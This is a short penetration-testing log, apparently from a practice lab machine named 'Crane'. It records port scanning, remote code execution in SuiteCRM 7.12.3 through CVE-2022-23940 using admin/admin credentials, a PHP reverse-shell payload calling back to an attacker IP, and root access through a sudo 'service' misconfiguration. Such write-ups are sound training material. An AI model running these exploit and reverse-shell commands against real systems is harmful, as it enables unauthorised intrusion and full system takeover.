Crane
๐งช Pentest Log: {{date:2025-08-10}}
๐ Target Information
- Machine Name: Crane
- IP Address: 192.168.187.146
- Operating System: Linux
ip=192.168.187.146
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Content Enumeration
admin"admin
SuiteCRM Version 7.12.3
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
Google "SuiteCRM Version 7.12.3 exploit", found
https://medium.com/@_crac/cve-2022-23940-rce-in-suitecrm-90df53980d8c
Port 3306
Port 33060
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://github.com/manuelz120/CVE-2022-23940
python3 exploit.py -h http://$ip -u admin -p admin -P "php -r '\$sock=fsockopen(\"192.168.45.163\", 80); exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
penelope -p 80
๐งฌ Privilege Escalation
๐ค Current Access
- User: www-data
- Groups: www-data
- Shell Type: reverse shell
๐ Enumeration
Sudo:
sudo -l
found
User www-data may run the following commands on localhost:
(ALL) NOPASSWD: /usr/sbin/service
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Sudo Misconfiguration
- Target Binary/Service: Service
- Reference / Source: GTFOBins
๐ง Exploit Steps
- Smash to root
sudo service ../../bin/sh